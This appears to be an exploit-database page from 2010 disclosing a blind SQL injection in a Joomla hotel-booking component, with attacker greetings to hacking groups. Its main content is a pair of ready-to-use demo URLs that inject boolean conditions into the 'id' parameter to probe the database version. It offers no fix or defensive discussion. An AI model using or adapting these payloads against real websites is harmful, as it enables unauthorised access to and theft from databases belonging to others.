[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
# Published : 2010-01-07
# Author : Hussin X
# Previous Title : 0day Drupal <= 6.15 Multiple Permanent XSS
# Next Title : ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability
Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com/vb
___________________________________
script : http://www.joomlahbs.com/
Demo :
_______
http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )
http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )
Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack